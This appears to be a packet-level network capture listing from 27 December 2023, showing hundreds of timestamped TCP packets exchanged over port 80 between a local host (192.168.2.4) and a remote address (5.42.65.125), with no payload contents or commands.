Dec 27, 2023 18:12:25.417449951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417464972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417467117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417484999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417490005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417491913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417527914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417555094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417562962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417573929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417579889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417603970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418040991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418085098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418108940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418153048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418159962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418174982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418194056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418217897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418221951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418256998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418263912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418287992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418299913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418323040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418339014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418345928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418374062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418385029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418402910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418430090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418453932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418462038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418498039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418569088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418576956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418592930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418600082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418611050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418613911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418617964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418625116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418632984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418632984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418639898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418667078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.418687105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418695927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.418724060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419018984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419075966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419080019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419085979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419092894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419121981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419142008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419150114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419156075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419173956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419176102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419197083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419215918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419223070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419229031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419250965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419259071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419276953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419306993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419315100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419351101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419384956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419393063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419404984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419411898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419420004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419425964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419430971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419446945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.419455051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419462919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419475079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419481993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.419504881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.468311071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511001110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511012077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511082888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511096954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511104107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511116028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511121988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511126995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511138916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511145115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511152029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511152029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511157990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511164904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511171103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511178017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511183977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511184931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511192083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511203051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511219978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511235952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511266947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511275053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511281967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511287928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511295080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511302948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511311054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511316061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511322021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511338949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511372089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511384010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511390924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511403084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511409044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511428118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511450052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511451960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511482000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511490107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511496067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511512995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511528015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511625051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511743069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511750937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511758089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511790991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511809111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511816025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511827946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511835098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511857033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511935949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511943102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511950016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511956930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511964083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511974096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511980057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.511981964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.511986017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512003899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512011051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512017012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512017012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512025118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512031078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512032986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512041092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512048006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512048960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512077093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512526035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512535095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512542009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512573957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512665987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512705088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512713909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512728930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512737989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512746096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512753010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512773037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512799025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512808084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512814999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512826920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512835026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512841940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512849092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512852907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512876987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512902975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512928963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512937069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512952089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512963057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512970924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512983084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.512989998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.512990952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513010025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513027906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513252974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513261080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513288975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513305902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513442993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513449907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513463974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513470888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513482094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513487101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513489008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513495922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513508081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513514042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513515949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513521910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513531923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513537884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513540030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513546944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513554096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513557911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513561964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513578892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513597012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513619900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513653040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513659954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513670921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513689995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513696909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513696909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513721943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513727903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513730049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513748884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.513763905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.513766050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514197111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514204025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514210939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514236927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514245033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514254093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514266014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514296055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514313936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514322042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514334917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514364004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514427900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514436007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514461040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514494896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514533043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514615059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514622927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514657021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514794111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514801979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514839888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514842033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.514872074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514878988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514887094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.514915943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515019894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515137911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515376091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515399933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515422106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515449047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515477896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515485048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515491962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515499115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515506029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515517950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515522003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515551090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515567064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515726089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515734911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515770912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515774012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515782118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515814066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.515897036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515986919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.515995026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516031981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516056061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516063929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516108990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516129971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516136885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516144037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516169071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516185045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516191959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516192913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516227961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516448021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516566038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516601086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516608000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516616106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516623020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516638041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516664982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516690016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516696930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516709089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516716003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516737938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516762972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.516983032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.516990900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517026901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517090082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517097950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517136097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517162085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517169952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517177105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517211914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517237902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517245054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517277956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517288923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517301083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517313957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517335892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517358065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517369032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517637968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517644882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517657042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517663956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517676115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517682076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517683029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517690897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517712116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517713070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517720938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517734051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517755985 CET	80	49738	5.42.65.125	192.168.2.4
